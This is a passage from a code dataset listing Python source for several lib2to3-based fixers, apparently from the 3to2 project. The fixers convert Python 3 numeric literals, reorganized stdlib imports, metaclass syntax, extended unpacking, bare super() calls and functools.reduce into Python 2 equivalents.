code
stringlengths 501
5.19M
| package
stringlengths 2
81
| path
stringlengths 9
304
| filename
stringlengths 4
145
|
---|---|---|---|
import re
from lib2to3.pgen2 import token
from lib2to3 import fixer_base
from lib2to3.pygram import python_symbols as syms
from lib2to3.pytree import Node
from lib2to3.fixer_util import Number, Call, Attr, String, Name, ArgList, Comma
# Map py3k base-prefix characters to their numeric bases.
baseMAPPING = {'b': 2, 'o': 8, 'x': 16}

def base(literal):
    """Return the base (2, 8, 10, or 16) of a valid py3k integer literal.

    Returns 0 for strings that start with "0" but carry no recognized base
    prefix (e.g. a py2k-style octal such as "0777"), which downstream code
    treats as "not a convertible literal".
    """
    literal = literal.strip()
    # Base 10: anything not starting with 0, or a string of one or more zeros.
    if not literal.startswith("0") or re.match(r"0+$", literal):
        return 10
    # Lowercase the prefix character so uppercase literals (0B10, 0O17,
    # 0X1F -- all valid py3k forms, and explicitly handled by
    # FixNumliterals.transform) are recognized instead of falling into the
    # base-0 bucket and never being converted.
    prefix = literal[1].lower()
    if prefix not in baseMAPPING:
        return 0
    return baseMAPPING[prefix]
class FixNumliterals(fixer_base.BaseFix):
    # We need to modify all numeric literals except floats, complex.

    def unmatch(self, node):
        """Don't match complex numbers, floats, or base-10 ints"""
        val = node.value
        # Any of these characters marks a complex or float literal.
        for bad in "jJ+-.":
            if bad in val: return bad
        base_ = base(val)
        # Base-10 and base-16 literals are already valid py2k syntax.
        return base_ == 10 or base_ == 16

    def match(self, node):
        """Match number literals that are not excluded by self.unmatch"""
        return (node.type == token.NUMBER) and not self.unmatch(node)

    def transform(self, node, results):
        """
        Call __builtins__.long() with the value and the base of the value.
        This works because 0b10 is int("10", 2), 0o10 is int("10", 8), etc.
        """
        val = node.value
        base_ = base(val)
        if base_ == 8:
            # py3k octal 0o777 becomes py2k octal 0777: keep the leading
            # zero, drop the 'o'.
            assert val.strip().startswith("0o") or \
                val.strip().startswith("0O"), "Invalid format for octal literal"
            node.changed()
            node.value = "".join(("0", val[2:]))
        elif base_ == 2:
            # py2.5 has no binary literals, so 0b1010 becomes
            # __builtins__.long("1010", 2).
            assert val.startswith("0") and val[1] in "bB", \
                "Invalid format for binary literal"
            # __builtins__.long
            func_name = Node(syms.power, Attr(Name("__builtins__"),
                                              Name("long")))
            # ("...", 2)
            func_args = [String("".join(("\"", val.strip()[2:], "\""))),
                         Comma(), Number(2, prefix=" ")]
            new_node = Call(func_name, func_args, node.prefix)
            return new_node
from lib2to3 import fixer_base
from lib2to3.fixer_util import Name, String, FromImport, Newline, Comma
from ..fixer_util import token, syms, Leaf, Node, Star, indentation, ImportAsName
# Names re-exported by the Tkinter-based py2k dialog modules (FileDialog,
# SimpleDialog, tkSimpleDialog); used below to extend their name sets.
TK_BASE_NAMES = ('ACTIVE', 'ALL', 'ANCHOR', 'ARC','BASELINE', 'BEVEL', 'BOTH',
                 'BOTTOM', 'BROWSE', 'BUTT', 'CASCADE', 'CENTER', 'CHAR',
                 'CHECKBUTTON', 'CHORD', 'COMMAND', 'CURRENT', 'DISABLED',
                 'DOTBOX', 'E', 'END', 'EW', 'EXCEPTION', 'EXTENDED', 'FALSE',
                 'FIRST', 'FLAT', 'GROOVE', 'HIDDEN', 'HORIZONTAL', 'INSERT',
                 'INSIDE', 'LAST', 'LEFT', 'MITER', 'MOVETO', 'MULTIPLE', 'N',
                 'NE', 'NO', 'NONE', 'NORMAL', 'NS', 'NSEW', 'NUMERIC', 'NW',
                 'OFF', 'ON', 'OUTSIDE', 'PAGES', 'PIESLICE', 'PROJECTING',
                 'RADIOBUTTON', 'RAISED', 'READABLE', 'RIDGE', 'RIGHT',
                 'ROUND', 'S', 'SCROLL', 'SE', 'SEL', 'SEL_FIRST', 'SEL_LAST',
                 'SEPARATOR', 'SINGLE', 'SOLID', 'SUNKEN', 'SW', 'StringTypes',
                 'TOP', 'TRUE', 'TclVersion', 'TkVersion', 'UNDERLINE',
                 'UNITS', 'VERTICAL', 'W', 'WORD', 'WRITABLE', 'X', 'Y', 'YES',
                 'wantobjects')

# Maps each candidate py2k module to the public names it provides; consulted
# by new_package() to decide which old module supplies an imported name.
PY2MODULES = {
    'urllib2' : (
        'AbstractBasicAuthHandler', 'AbstractDigestAuthHandler',
        'AbstractHTTPHandler', 'BaseHandler', 'CacheFTPHandler',
        'FTPHandler', 'FileHandler', 'HTTPBasicAuthHandler',
        'HTTPCookieProcessor', 'HTTPDefaultErrorHandler',
        'HTTPDigestAuthHandler', 'HTTPError', 'HTTPErrorProcessor',
        'HTTPHandler', 'HTTPPasswordMgr',
        'HTTPPasswordMgrWithDefaultRealm', 'HTTPRedirectHandler',
        'HTTPSHandler', 'OpenerDirector', 'ProxyBasicAuthHandler',
        'ProxyDigestAuthHandler', 'ProxyHandler', 'Request',
        'StringIO', 'URLError', 'UnknownHandler', 'addinfourl',
        'build_opener', 'install_opener', 'parse_http_list',
        'parse_keqv_list', 'randombytes', 'request_host', 'urlopen'),
    'urllib' : (
        'ContentTooShortError', 'FancyURLopener','URLopener',
        'basejoin', 'ftperrors', 'getproxies',
        'getproxies_environment', 'localhost', 'pathname2url',
        'quote', 'quote_plus', 'splitattr', 'splithost',
        'splitnport', 'splitpasswd', 'splitport', 'splitquery',
        'splittag', 'splittype', 'splituser', 'splitvalue',
        'thishost', 'unquote', 'unquote_plus', 'unwrap',
        'url2pathname', 'urlcleanup', 'urlencode', 'urlopen',
        'urlretrieve',),
    'urlparse' : (
        'parse_qs', 'parse_qsl', 'urldefrag', 'urljoin',
        'urlparse', 'urlsplit', 'urlunparse', 'urlunsplit'),
    'dbm' : (
        'ndbm', 'gnu', 'dumb'),
    'anydbm' : (
        'error', 'open'),
    'whichdb' : (
        'whichdb',),
    'BaseHTTPServer' : (
        'BaseHTTPRequestHandler', 'HTTPServer'),
    'CGIHTTPServer' : (
        'CGIHTTPRequestHandler',),
    'SimpleHTTPServer' : (
        'SimpleHTTPRequestHandler',),
    'FileDialog' : TK_BASE_NAMES + (
        'FileDialog', 'LoadFileDialog', 'SaveFileDialog',
        'dialogstates', 'test'),
    'tkFileDialog' : (
        'Directory', 'Open', 'SaveAs', '_Dialog', 'askdirectory',
        'askopenfile', 'askopenfilename', 'askopenfilenames',
        'askopenfiles', 'asksaveasfile', 'asksaveasfilename'),
    'SimpleDialog' : TK_BASE_NAMES + (
        'SimpleDialog',),
    'tkSimpleDialog' : TK_BASE_NAMES + (
        'askfloat', 'askinteger', 'askstring', 'Dialog'),
    'SimpleXMLRPCServer' : (
        'CGIXMLRPCRequestHandler', 'SimpleXMLRPCDispatcher',
        'SimpleXMLRPCRequestHandler', 'SimpleXMLRPCServer',
        'list_public_methods', 'remove_duplicates',
        'resolve_dotted_attribute'),
    'DocXMLRPCServer' : (
        'DocCGIXMLRPCRequestHandler', 'DocXMLRPCRequestHandler',
        'DocXMLRPCServer', 'ServerHTMLDoc','XMLRPCDocGenerator'),
    }
# Maps each py3k module ("package.module") to the tuple of py2k modules
# whose contents it absorbed; '.__init__' denotes the bare py3k package.
MAPPING = { 'urllib.request' :
                ('urllib2', 'urllib'),
            'urllib.error' :
                ('urllib2', 'urllib'),
            'urllib.parse' :
                ('urllib2', 'urllib', 'urlparse'),
            'dbm.__init__' :
                ('anydbm', 'whichdb'),
            'http.server' :
                ('CGIHTTPServer', 'SimpleHTTPServer', 'BaseHTTPServer'),
            'tkinter.filedialog' :
                ('tkFileDialog', 'FileDialog'),
            'tkinter.simpledialog' :
                ('tkSimpleDialog', 'SimpleDialog'),
            'xmlrpc.server' :
                ('DocXMLRPCServer', 'SimpleXMLRPCServer'),
            }

# helps match 'http', as in 'from http.server import ...'
simple_name = "name='{name}'"
# helps match 'server', as in 'from http.server import ...'
simple_attr = "attr='{attr}'"
# helps match 'HTTPServer', as in 'from http.server import HTTPServer'
simple_using = "using='{using}'"
# helps match 'urllib.request', as in 'import urllib.request'
dotted_name = "dotted_name=dotted_name< {fmt_name} '.' {fmt_attr} >"
# helps match 'http.server', as in 'http.server.HTTPServer(...)'
power_twoname = "pow=power< {fmt_name} trailer< '.' {fmt_attr} > trailer< '.' using=any > any* >"
# helps match 'dbm.whichdb', as in 'dbm.whichdb(...)'
power_onename = "pow=power< {fmt_name} trailer< '.' using=any > any* >"
# helps match 'from http.server import HTTPServer'
# also helps match 'from http.server import HTTPServer, SimpleHTTPRequestHandler'
# also helps match 'from http.server import *'
from_import = "from_import=import_from< 'from' {modules} 'import' (import_as_name< using=any 'as' renamed=any> | in_list=import_as_names< using=any* > | using='*' | using=NAME) >"
# helps match 'import urllib.request'
name_import = "name_import=import_name< 'import' ({fmt_name} | in_list=dotted_as_names< imp_list=any* >) >"

#############
# WON'T FIX #
#############
# These renaming forms are still matched, but only so FixImports2.transform
# can report them via cannot_convert rather than silently skipping them.

# helps match 'import urllib.request as name'
name_import_rename = "name_import_rename=dotted_as_name< {fmt_name} 'as' renamed=any >"
# helps match 'from http import server'
from_import_rename = "from_import_rename=import_from< 'from' {fmt_name} 'import' ({fmt_attr} | import_as_name< {fmt_attr} 'as' renamed=any > | in_list=import_as_names< any* ({fmt_attr} | import_as_name< {fmt_attr} 'as' renamed=any >) any* >) >"
def all_modules_subpattern():
    """
    Build one alternation pattern covering every toplevel py3k module name
    in MAPPING (urllib, http, etc), in both dotted and bare forms.
    """
    split_mods = [mod.split(".") for mod in MAPPING]
    dotted_alts = [dotted_name.format(fmt_name=simple_name.format(name=first),
                                      fmt_attr=simple_attr.format(attr=second))
                   for first, second in split_mods]
    # Bare names are only meaningful for packages mapped via '__init__'.
    bare_alts = [simple_name.format(name=first)
                 for first, second in split_mods if second == "__init__"]
    return "( " + " | ".join(dotted_alts) + " | " + " | ".join(bare_alts) + " )"
def all_candidates(name, attr, MAPPING=MAPPING):
    """
    Return every candidate py2k package that could supply name.attr.
    For '__init__' mappings, the bare py3k package name is also a candidate.
    """
    dotted = name + '.' + attr
    assert dotted in MAPPING, "No matching package found."
    candidates = MAPPING[dotted]
    if attr != '__init__':
        return candidates
    return candidates + (name,)
def new_package(name, attr, using, MAPPING=MAPPING, PY2MODULES=PY2MODULES):
    """
    Return the candidate py2k package for name.attr that provides `using`,
    or None when no candidate exports that name.
    """
    found = None
    for candidate in all_candidates(name, attr, MAPPING):
        if using in PY2MODULES[candidate]:
            found = candidate
            break
    return found
def build_import_pattern(mapping1, mapping2):
    """
    mapping1: A dict mapping py3k modules to all possible py2k replacements
    mapping2: A dict mapping py2k modules to the things they do

    Yields the pieces of a HUGE pattern matching every way these modules
    can be imported or referenced.
    """
    # Covers 'from <any known module> import ...' in one shot.
    yield from_import.format(modules=all_modules_subpattern())
    for py3k in mapping1:
        head, tail = py3k.split('.')
        fmt_head = simple_name.format(name=head)
        fmt_tail = simple_attr.format(attr=tail)
        fmt_dotted = dotted_name.format(fmt_name=fmt_head, fmt_attr=fmt_tail)
        yield name_import.format(fmt_name=fmt_dotted)
        yield power_twoname.format(fmt_name=fmt_head, fmt_attr=fmt_tail)
        if tail == '__init__':
            # Bare package forms: 'import dbm', 'dbm.whichdb(...)'.
            yield name_import.format(fmt_name=fmt_head)
            yield power_onename.format(fmt_name=fmt_head)
        yield name_import_rename.format(fmt_name=fmt_dotted)
        yield from_import_rename.format(fmt_name=fmt_head, fmt_attr=fmt_tail)
def name_import_replacement(name, attr):
    """Build an 'import mod1, mod2, ...' node listing every py2k candidate
    for name.attr."""
    kids = [Name("import")]
    for candidate in all_candidates(name.value, attr.value):
        kids.extend((Name(candidate, prefix=" "), Comma()))
    kids.pop()  # drop the trailing comma
    return Node(syms.import_name, kids)
class FixImports2(fixer_base.BaseFix):
    """Rewrite imports/uses of reorganized py3k stdlib modules into their
    py2k equivalents, consulting MAPPING and PY2MODULES."""

    run_order = 4

    PATTERN = " | \n".join(build_import_pattern(MAPPING, PY2MODULES))

    def transform(self, node, results):
        # The patterns dictate which of these names will be defined
        name = results.get("name")
        attr = results.get("attr")
        if attr is None:
            attr = Name("__init__")
        using = results.get("using")
        in_list = results.get("in_list")
        imp_list = results.get("imp_list")
        power = results.get("pow")
        before = results.get("before")  # NOTE(review): fetched but unused below
        after = results.get("after")    # NOTE(review): fetched but unused below
        d_name = results.get("dotted_name")
        # An import_stmt is always contained within a simple_stmt
        simple_stmt = node.parent
        # The parent is useful for adding new import_stmts
        parent = simple_stmt.parent
        idx = parent.children.index(simple_stmt)
        if any((results.get("from_import_rename") is not None,
                results.get("name_import_rename") is not None)):
            # 'import x as y' / 'from x import y' forms bind one name to
            # possibly several py2k modules; refuse rather than guess.
            self.cannot_convert(node, reason="ambiguity: import binds a single name")
        elif using is None and not in_list:
            # import urllib.request, single-name import
            replacement = name_import_replacement(name, attr)
            replacement.prefix = node.prefix
            node.replace(replacement)
        elif using is None:
            # import ..., urllib.request, math, http.server, ...
            for d_name in imp_list:
                if d_name.type == syms.dotted_name:
                    name = d_name.children[0]
                    attr = d_name.children[2]
                elif d_name.type == token.NAME and d_name.value + ".__init__" in MAPPING:
                    name = d_name
                    attr = Name("__init__")
                else:
                    continue
                if name.value + "." + attr.value not in MAPPING:
                    continue
                candidates = all_candidates(name.value, attr.value)
                children = [Name("import")]
                for c in candidates:
                    children.append(Name(c, prefix=" "))
                    children.append(Comma())
                children.pop()
                # Put in the new statement.
                indent = indentation(simple_stmt)
                next_stmt = Node(syms.simple_stmt, [Node(syms.import_name, children), Newline()])
                parent.insert_child(idx+1, next_stmt)
                parent.insert_child(idx+1, Leaf(token.INDENT, indent))
                # Remove the old imported name along with its neighboring comma.
                test_comma = d_name.next_sibling
                if test_comma and test_comma.type == token.COMMA:
                    test_comma.remove()
                elif test_comma is None:
                    test_comma = d_name.prev_sibling
                    if test_comma and test_comma.type == token.COMMA:
                        test_comma.remove()
                d_name.remove()
                if not in_list.children:
                    # Every name on the line was replaced; drop the line.
                    simple_stmt.remove()
        elif in_list is not None:
            ##########################################################
            # "from urllib.request import urlopen, urlretrieve, ..." #
            # Replace one import statement with potentially many.    #
            ##########################################################
            packages = dict([(n,[]) for n in all_candidates(name.value,
                                                            attr.value)])
            # Figure out what names need to be imported from what
            # Add them to a dict to be parsed once we're completely done
            for imported in using:
                if imported.type == token.COMMA:
                    continue
                if imported.type == syms.import_as_name:
                    test_name = imported.children[0].value
                    if len(imported.children) > 2:
                        # 'as' whatever
                        rename = imported.children[2].value
                    else:
                        rename = None
                elif imported.type == token.NAME:
                    test_name = imported.value
                    rename = None
                # NOTE(review): assumes every non-comma child is an
                # import_as_name or a NAME; otherwise test_name/rename
                # would be unbound here -- confirm against the PATTERN.
                pkg = new_package(name.value, attr.value, test_name)
                packages[pkg].append((test_name, rename))
            # Parse the dict to create new import statements to replace this one
            imports = []
            for new_pkg, names in packages.items():
                if not names:
                    # Didn't import anything from that package, move along
                    continue
                new_names = []
                for test_name, rename in names:
                    if rename is None:
                        new_names.append(Name(test_name, prefix=" "))
                    else:
                        new_names.append(ImportAsName(test_name, rename, prefix=" "))
                    new_names.append(Comma())
                new_names.pop()
                imports.append(FromImport(new_pkg, new_names))
            # Replace this import statement with one of the others
            replacement = imports.pop()
            replacement.prefix = node.prefix
            node.replace(replacement)
            indent = indentation(simple_stmt)
            # Add the remainder of the imports as new statements.
            while imports:
                next_stmt = Node(syms.simple_stmt, [imports.pop(), Newline()])
                parent.insert_child(idx+1, next_stmt)
                parent.insert_child(idx+1, Leaf(token.INDENT, indent))
        elif using.type == token.STAR:
            # from urllib.request import *
            # Star-import from every candidate so all names stay visible.
            nodes = [FromImport(pkg, [Star(prefix=" ")]) for pkg in
                     all_candidates(name.value, attr.value)]
            replacement = nodes.pop()
            replacement.prefix = node.prefix
            node.replace(replacement)
            indent = indentation(simple_stmt)
            while nodes:
                next_stmt = Node(syms.simple_stmt, [nodes.pop(), Newline()])
                parent.insert_child(idx+1, next_stmt)
                parent.insert_child(idx+1, Leaf(token.INDENT, indent))
        elif power is not None:
            # urllib.request.urlopen
            # Replace it with urllib2.urlopen
            pkg = new_package(name.value, attr.value, using.value)
            # Remove the trailer node that contains attr.
            if pkg:
                if attr.parent:
                    attr.parent.remove()
                name.replace(Name(pkg, prefix=name.prefix))
        elif using.type == token.NAME:
            # from urllib.request import urlopen
            pkg = new_package(name.value, attr.value, using.value)
            if attr.value == "__init__" and pkg == name.value:
                # Replacing "from abc import xyz" with "from abc import xyz"
                # Just leave it alone so as not to mess with other fixers
                return
            else:
                node.replace(FromImport(pkg, [using]))
from lib2to3 import fixer_base
from ..fixer_util import Name, syms, Node, Leaf, Newline, find_root, indentation, suitify
from lib2to3.pygram import token
def has_metaclass(parent):
    """Scan a classdef's children for a 'metaclass=X' keyword argument.

    Returns None when absent; otherwise either [argument_node, name, '=',
    value] (single-argument case) or (comma, name, '=', value) (arglist
    case) -- every returned node is later removed by FixMetaclass.
    """
    results = None
    for node in parent.children:
        kids = node.children
        if node.type == syms.argument:
            # class X(metaclass=Y): the keyword is the whole argument node.
            if kids[0] == Leaf(token.NAME, "metaclass") and \
               kids[1] == Leaf(token.EQUAL, "=") and \
               kids[2]:
                #Hack to avoid "class X(=):" with this case.
                results = [node] + kids
                break
        elif node.type == syms.arglist:
            # Argument list... loop through it looking for:
            # Node(*, [*, Leaf(token.NAME, u"metaclass"), Leaf(token.EQUAL, u"="), Leaf(*, *)]
            for child in node.children:
                if results: break
                if child.type == token.COMMA:
                    #Store the last comma, which precedes the metaclass
                    comma = child
                elif type(child) == Node:
                    meta = equal = name = None
                    for arg in child.children:
                        if arg == Leaf(token.NAME, "metaclass"):
                            #We have the (metaclass) part
                            meta = arg
                        elif meta and arg == Leaf(token.EQUAL, "="):
                            #We have the (metaclass=) part
                            equal = arg
                        elif meta and equal:
                            #Here we go, we have (metaclass=X)
                            # NOTE(review): relies on a comma having been seen
                            # before the metaclass node; 'comma' would be
                            # unbound if metaclass came first in the arglist
                            # (not producible by valid py3k syntax) -- confirm.
                            name = arg
                            results = (comma, meta, equal, name)
                            break
    return results
class FixMetaclass(fixer_base.BaseFix):
    """Convert 'class X(..., metaclass=M):' into the py2k idiom:
    remove the keyword argument and insert '__metaclass__ = M' as the
    first statement of the class body."""

    PATTERN = """
    classdef<any*>
    """

    def transform(self, node, results):
        meta_results = has_metaclass(node)
        if not meta_results: return
        # Remove every node involved in 'metaclass=M' (comma/keyword/value).
        for meta in meta_results:
            meta.remove()
        target = Leaf(token.NAME, "__metaclass__")
        equal = Leaf(token.EQUAL, "=", prefix=" ")
        # meta is the last item in what was returned by has_metaclass(): name
        name = meta
        name.prefix = " "
        # The '__metaclass__ = M' statement to insert into the body.
        stmt_node = Node(syms.atom, [target, equal, name])

        suitify(node)
        left_ind, right_ind = 0, 0
        for (ind, item) in enumerate(node.children):
            if item.type == token.LPAR:
                left_ind = ind
            elif item.type == token.RPAR:
                right_ind = ind
            if item.type == syms.suite:
                for stmt in item.children:
                    if stmt.type == token.INDENT:
                        # Insert, in reverse order, the statement, a newline,
                        # and an indent right after the first indented line
                        loc = item.children.index(stmt) + 1
                        # Keep consistent indentation form
                        ident = Leaf(token.INDENT, stmt.value)
                        item.insert_child(loc, ident)
                        item.insert_child(loc, Newline())
                        item.insert_child(loc, stmt_node)
                        break
        # If removing the metaclass left empty parens 'class X():', give the
        # class an explicit 'object' base.
        if right_ind - left_ind == 1:
            node.insert_child(left_ind + 1, Name("object"))
from lib2to3 import fixer_base
from itertools import count
from ..fixer_util import Assign, Comma, Call, Newline, Name, Number, indentation, suitify, commatize, token, syms, Node, Leaf
def assignment_source(num_pre, num_post, LISTNAME, ITERNAME):
    """
    Accepts num_pre and num_post, which are counts of values
    before and after the starg (not including the starg)
    Returns a source fit for Assign() from fixer_util

    The built expression has the shape
        LISTNAME[:pre] + [LISTNAME[pre:-post]] + LISTNAME[-post:]
    with the first/last pieces omitted when their count is zero.
    (ITERNAME is accepted for signature symmetry with the callers;
    it is not used in this function.)
    """
    children = []
    pre = str(num_pre)
    post = str(num_post)
    # This code builds the assignment source from lib2to3 tree primitives.
    # It's not very readable, but it seems like the most correct way to do it.
    if num_pre > 0:
        # LISTNAME[:pre]
        pre_part = Node(syms.power, [Name(LISTNAME), Node(syms.trailer, [Leaf(token.LSQB, "["), Node(syms.subscript, [Leaf(token.COLON, ":"), Number(pre)]), Leaf(token.RSQB, "]")])])
        children.append(pre_part)
        children.append(Leaf(token.PLUS, "+", prefix=" "))
    # [LISTNAME[pre:-post]] -- the starred target receives the middle slice
    # wrapped in a list.  Empty Leaf(1, "") stands in for an omitted bound.
    main_part = Node(syms.power, [Leaf(token.LSQB, "[", prefix=" "), Name(LISTNAME), Node(syms.trailer, [Leaf(token.LSQB, "["), Node(syms.subscript, [Number(pre) if num_pre > 0 else Leaf(1, ""), Leaf(token.COLON, ":"), Node(syms.factor, [Leaf(token.MINUS, "-"), Number(post)]) if num_post > 0 else Leaf(1, "")]), Leaf(token.RSQB, "]"), Leaf(token.RSQB, "]")])])
    children.append(main_part)
    if num_post > 0:
        children.append(Leaf(token.PLUS, "+", prefix=" "))
        # LISTNAME[-post:]
        post_part = Node(syms.power, [Name(LISTNAME, prefix=" "), Node(syms.trailer, [Leaf(token.LSQB, "["), Node(syms.subscript, [Node(syms.factor, [Leaf(token.MINUS, "-"), Number(post)]), Leaf(token.COLON, ":")]), Leaf(token.RSQB, "]")])])
        children.append(post_part)
    source = Node(syms.arith_expr, children)
    return source
class FixUnpacking(fixer_base.BaseFix):
    """Rewrite py3k extended unpacking ('a, *b, c = ...') into py2k-safe
    slicing over a temporary list (see transform's docstring)."""

    PATTERN = """
    expl=expr_stmt< testlist_star_expr<
        pre=(any ',')*
        star_expr< '*' name=NAME >
        post=(',' any)* [','] > '=' source=any > |
    impl=for_stmt< 'for' lst=exprlist<
        pre=(any ',')*
        star_expr< '*' name=NAME >
        post=(',' any)* [','] > 'in' it=any ':' suite=any>"""

    def fix_explicit_context(self, node, results):
        """Build the (setup, assignment) pair for 'pre, *name, post = source'."""
        pre, name, post, source = (results.get(n) for n in ("pre", "name", "post", "source"))
        pre = [n.clone() for n in pre if n.type == token.NAME]
        name.prefix = " "
        post = [n.clone() for n in post if n.type == token.NAME]
        target = [n.clone() for n in commatize(pre + [name.clone()] + post)]
        # to make the special-case fix for "*z, = ..." correct with the least
        # amount of modification, make the left-side into a guaranteed tuple
        target.append(Comma())
        source.prefix = ""
        # _3to2list = list(<source>)
        setup_line = Assign(Name(self.LISTNAME), Call(Name("list"), [source.clone()]))
        # pre..., name, post... = <slices of _3to2list>
        power_line = Assign(target, assignment_source(len(pre), len(post), self.LISTNAME, self.ITERNAME))
        return setup_line, power_line

    def fix_implicit_context(self, node, results):
        """
        Only example of the implicit context is
        a for loop, so only fix that.
        """
        pre, name, post, it = (results.get(n) for n in ("pre", "name", "post", "it"))
        pre = [n.clone() for n in pre if n.type == token.NAME]
        name.prefix = " "
        post = [n.clone() for n in post if n.type == token.NAME]
        target = [n.clone() for n in commatize(pre + [name.clone()] + post)]
        # to make the special-case fix for "*z, = ..." correct with the least
        # amount of modification, make the left-side into a guaranteed tuple
        target.append(Comma())
        source = it.clone()
        source.prefix = ""
        # _3to2list = list(_3to2iter), computed once per loop iteration
        setup_line = Assign(Name(self.LISTNAME), Call(Name("list"), [Name(self.ITERNAME)]))
        power_line = Assign(target, assignment_source(len(pre), len(post), self.LISTNAME, self.ITERNAME))
        return setup_line, power_line

    def transform(self, node, results):
        """
        a,b,c,d,e,f,*g,h,i = range(100) changes to
        _3to2list = list(range(100))
        a,b,c,d,e,f,g,h,i, = _3to2list[:6] + [_3to2list[6:-2]] + _3to2list[-2:]

        and

        for a,b,*c,d,e in iter_of_iters: do_stuff changes to
        for _3to2iter in iter_of_iters:
            _3to2list = list(_3to2iter)
            a,b,c,d,e, = _3to2list[:2] + [_3to2list[2:-2]] + _3to2list[-2:]
            do_stuff
        """
        self.LISTNAME = self.new_name("_3to2list")
        self.ITERNAME = self.new_name("_3to2iter")
        expl, impl = results.get("expl"), results.get("impl")
        if expl is not None:
            # Explicit assignment: insert the two new lines where the old
            # statement sat.
            setup_line, power_line = self.fix_explicit_context(node, results)
            setup_line.prefix = expl.prefix
            power_line.prefix = indentation(expl.parent)
            setup_line.append_child(Newline())
            parent = node.parent
            i = node.remove()
            parent.insert_child(i, power_line)
            parent.insert_child(i, setup_line)
        elif impl is not None:
            # For loop: rename the loop variable to _3to2iter and prepend
            # the unpacking lines to the (suitified) loop body.
            setup_line, power_line = self.fix_implicit_context(node, results)
            suitify(node)
            suite = [k for k in node.children if k.type == syms.suite][0]
            setup_line.prefix = ""
            power_line.prefix = suite.children[1].value
            suite.children[2].prefix = indentation(suite.children[2])
            suite.insert_child(2, Newline())
            suite.insert_child(2, power_line)
            suite.insert_child(2, Newline())
            suite.insert_child(2, setup_line)
            results.get("lst").replace(Name(self.ITERNAME, prefix=" "))
from .feature_base import Feature, Features
from lib2to3 import fixer_base
FEATURES = [
#(FeatureName,
# FeaturePattern,
# FeatureMinVersion,
#),
("memoryview",
"power < 'memoryview' trailer < '(' any* ')' > any* >",
"2.7",
),
("numbers",
"""import_from< 'from' 'numbers' 'import' any* > |
import_name< 'import' ('numbers' dotted_as_names< any* 'numbers' any* >) >""",
"2.6",
),
("abc",
"""import_name< 'import' ('abc' dotted_as_names< any* 'abc' any* >) > |
import_from< 'from' 'abc' 'import' any* >""",
"2.6",
),
("io",
"""import_name< 'import' ('io' dotted_as_names< any* 'io' any* >) > |
import_from< 'from' 'io' 'import' any* >""",
"2.6",
),
("bin",
"power< 'bin' trailer< '(' any* ')' > any* >",
"2.6",
),
("formatting",
"power< any trailer< '.' 'format' > trailer< '(' any* ')' > >",
"2.6",
),
("nonlocal",
"global_stmt< 'nonlocal' any* >",
"3.0",
),
("with_traceback",
"trailer< '.' 'with_traceback' >",
"3.0",
),
]
class FixFeatures(fixer_base.BaseFix):
    """Warn about py2.6/2.7-only features and refuse to convert py3k-only
    ones, as declared in the FEATURES table."""

    run_order = 9 # Wait until all other fixers have run to check for these

    # To avoid spamming, we only want to warn for each feature once.
    features_warned = set()

    # Build features from the list above
    features = Features([Feature(name, pattern, version) for
                         name, pattern, version in FEATURES])

    PATTERN = features.PATTERN

    def match(self, node):
        """Match like BaseFix, but strip the generic 'node' entry so the
        results mapping carries only feature-specific keys."""
        to_ret = super(FixFeatures, self).match(node)
        # BaseFix.match returns False (no match) or a results dict.  The
        # original deleted 'node' inside a blanket try/except Exception,
        # which also swallowed unrelated errors; an explicit check keeps
        # the same behavior without hiding real failures.
        if isinstance(to_ret, dict):
            to_ret.pop('node', None)
        return to_ret

    def transform(self, node, results):
        for feature_name in results:
            if feature_name in self.features_warned:
                continue
            else:
                curr_feature = self.features[feature_name]
                # Features introduced in 3.x cannot be converted at all;
                # 2.6/2.7-only ones merely earn a warning.
                if curr_feature.version >= "3":
                    fail = self.cannot_convert
                else:
                    fail = self.warning
                fail(node, reason=curr_feature.message_text())
                self.features_warned.add(feature_name)
from lib2to3 import fixer_base
from ..fixer_util import Node, Leaf, token, syms, Name, Comma, Dot
# A '.__class__' trailer, cloned by insert_args() when the enclosing class
# name is not available and the class must be derived from the first
# parameter instead.
dot_class = Node(syms.trailer, [Dot(), Name("__class__")])
def get_firstparam(super_node):
    """Return the name of the first parameter of the funcdef enclosing a
    bare super() call, or None if there is no enclosing funcdef or no
    usable first parameter."""
    enclosing = super_node.parent
    while enclosing.type != syms.funcdef and enclosing.parent:
        enclosing = enclosing.parent
    if enclosing.type != syms.funcdef:
        # super() called without arguments outside of a funcdef
        return None
    kids = enclosing.children
    assert len(kids) > 2
    params = kids[2]
    assert params.type == syms.parameters
    if len(params.children) < 3:
        # Function has no parameters, therefore super() makes no sense here...
        return None
    args = params.children[1]
    if args.type == token.NAME:
        # Exactly one parameter.
        return args.value
    if args.type != syms.typedargslist:
        return None
    assert len(args.children) > 0
    first = args.children[0]
    # The first slot may be a '*' rather than a name.
    return first.value if first.type == token.NAME else None
def get_class_name(super_node):
    """Return the name of the classdef enclosing a bare super() call,
    or None if the call is not inside a classdef."""
    enclosing = super_node.parent
    while enclosing.type != syms.classdef and enclosing.parent:
        enclosing = enclosing.parent
    if enclosing.type != syms.classdef:
        # super() called without arguments outside of a classdef
        return None
    kids = enclosing.children
    assert len(kids) > 2
    name_leaf = kids[1]
    assert name_leaf.type == token.NAME
    return name_leaf.value
def insert_args(name, class_name, rparen):
    """Insert '<class>, <name>' before the ')' of a bare super() call,
    turning super() into super(Class, self) / super(self.__class__, self)."""
    holder = rparen.parent
    if class_name:
        cls_node = Node(syms.power, [Name(class_name)])
    else:
        # No class name available: fall back to <name>.__class__.
        cls_node = Node(syms.power, [Name(name), dot_class.clone()])
    pos = holder.children.index(rparen)
    # Each insert at the same index pushes the earlier ones rightward,
    # yielding the final order: <class>, ',', ' <name>', ')'.
    for new_child in (Name(name, prefix=" "), Comma(), cls_node):
        holder.insert_child(pos, new_child)
class FixSuper(fixer_base.BaseFix):
    """Rewrite py3k zero-argument super() into the explicit two-argument
    py2k form using the enclosing class and first parameter."""

    PATTERN = "power< 'super' trailer< '(' rparen=')' > any* >"

    def transform(self, node, results):
        # First parameter of the enclosing function (usually 'self').
        param = get_firstparam(node)
        if param is None:
            self.cannot_convert(node, "super() with no arguments must be called inside a function that has at least one parameter")
            return
        class_name = get_class_name(node)
        rparen = results["rparen"]
        insert_args(param, class_name, rparen)
from lib2to3 import fixer_base
from lib2to3.fixer_util import Call
from lib2to3.pytree import Node, Leaf
from lib2to3.pgen2 import token
class FixReduce(fixer_base.BaseFix):
    """Replace py3k functools.reduce usage with the py2k builtin reduce:
    rewrite 'functools.reduce(...)' calls and strip 'reduce' from
    'from functools import ...' statements."""

    PATTERN = """
    power< 'functools' trailer< '.' 'reduce' >
